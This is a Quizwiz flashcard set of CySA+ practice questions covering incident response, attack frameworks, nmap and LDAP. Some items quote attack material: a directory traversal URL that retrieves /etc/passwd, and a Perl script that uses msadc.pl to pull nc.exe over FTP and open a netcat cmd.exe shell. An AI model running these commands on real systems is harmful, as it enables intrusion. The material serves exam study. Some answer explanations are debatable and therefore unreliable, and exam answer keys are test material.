Cysa DION 3

अब Quizwiz के साथ अपने होमवर्क और परीक्षाओं को एस करें!

You are conducting a review of a VPN device's logs and found the following URL being accessed:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-https://sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Based upon this log entry alone, which of the following most likely occurred? A XML injection attack caused the VPN server to return the password file An SQL injection attack caused the VPN server to return the password file The /etc/passwd file was downloaded using a directory traversal attack if input validation of the URL was not conducted The /etc/passwd file was downloaded using a directory traversal attack

..\..\ = directory traversal As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack.

Which of the following tools could be used to detect unexpected output from an application being managed or monitored? A signature-based detection tool A behavior-based analysis tool Manual analysis A log analysis tool

A behavior-based analysis tool can capture/analyze normal behavior and then alert when an anomaly occurs. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not detect unexpected output by itself.

You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery? Restrict host access to peripheral protocols like USB and Bluetooth Restrict shell commands per user or per host for least privilege purposes Disable unused user account and reset the administrator credentials Scan the network for additional instances of this vulnerability and patch the affected assets

All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first.

Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use? Number of false positives Mean time to remediate Cost of incidents Alert volume

An increase in alert volume may correlate with an increase in detected incidents. By measuring this KPI, you can gain insights into the frequency of potential security incidents. While reducing false positives is important, this KPI does not directly provide information on the number of true security incidents being detected. This KPI measures how long it takes to address a security incident, not the number of incidents being detected. This KPI measures the financial impact of incidents, not their frequency or detection rate.

In the 2017 Equifax breach, the credit reporting company itself had vast amounts of sensitive personal data of consumers exposed due to a flaw in their Apache Struts web-application software. In the context of the Diamond Model of Intrusion Analysis, who does Equifax represent? Capability Infrastructure Victim Adversary

In the Diamond Model of Intrusion Analysis, Equifax represents the Victim as their systems and data were targeted in the breach. The Adversary is the entity conducting the attack, not the target of the attack. Infrastructure refers to the physical and virtual resources used in the attack, not the targeted entity. Capability refers to the tools and techniques used in the attack, not the targeted entity.

An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate? Command and Control Exploitation Impact Persistence

In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Persistence involves methods an adversary might use to maintain access within a network, but doesn't represent the use of a C2 server. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible. What should you do? Conduct remediation actions to update encryption keys on each server to match port 636 Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks Change all devices and servers that support it to port 636 since encrypted services run by default on port 636 Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical

LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636 since LDAP services over port 636 are encrypted by default.

In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process? Lessons learned (Incorrect) Root cause analysis (Correct) Incident response plan Forensic analysis Explanation

Root cause analysis involves identifying the initial cause or the underlying factors that contributed to an incident. An incident response plan outlines procedures and processes for handling security incidents. It is a preparation tool, not a post-incident activity to identify the underlying cause of an incident. The lessons learned process involves reviewing an incident to identify what was done well and what needs improvement for future responses. It does not primarily focus on identifying the underlying cause of the incident. While forensic analysis involves a meticulous examination of all evidence related to an incident, its primary aim is not to identify the underlying cause.

During the Sony Pictures hack in 2014, the attackers installed a wiper malware named Destover on Sony's systems to erase data. Which phase of the Cyber Kill Chain does this represent? Delivery Installation Reconnaissance Actions and Objectives

The installation of the wiper malware Destover on Sony's systems represents the Installation phase of the Cyber Kill Chain. Delivery is about transmitting the weaponized payload to the victim, not installing a payload. Actions and Objectives is when the attacker fulfills their intent, not installing a payload. Reconnaissance is about gathering information about the target system, not installing a payload.

You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list? Obscure web interface locations Implement identity and authentication controls Leverage security frameworks and libraries Implement appropriate access controls

The least likely option to appear in the list is to obscure web interface locations. This recommendation is based on security through obscurity and is not considered a good security practice. The other options are all considered best practices in designing web application security controls and creating software assurance in our programs.

You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation? nmap -O nmap -sS nmap -sX nmap -sT

The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.

While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands: system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");$o=; print "Opening FTP connection...\n";<br />system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); Which exploit is indicated by this script Buffer overflow exploit Denial of Service exploit SQL injection exploit Chained exploit

The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor.

During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup's system access. What could this potentially lead to? A reduction in overall project costs An increase in the cybersecurity measures employed by the multinational corporation Potentially restricting ability to fully remediate vulnerabilities Greater market visibility for the startup

This situation could potentially lead to the startup having a restricted ability to fully remediate vulnerabilities within their systems. Due to the limitations placed by the MOU, the startup might not have the necessary access to apply patches, make configuration changes, or implement compensating controls as swiftly or comprehensively as needed. This could increase the time it takes to remediate vulnerabilities and potentially increase their exposure to risk. While the MOU outlines the agreement between the two parties, it does not inherently lead to cost reductions. While collaborating with a large corporation may increase visibility, this is unrelated to vulnerability management. The MOU does not directly affect the cybersecurity measures of the multinational corporation.


संबंधित स्टडी सेट्स

The Marketing Mix & The 4 P's of Marketing

View Set

Ch. 6 Process selection and Facility Layout LearnSmart

View Set

Muscles of the Lips and Facial Expression

View Set

Comparing and Contrasting Two Versions of The War of the Worlds Quiz 100%!!!!

View Set

University Physics II Midterm 2017 Multiple Choice

View Set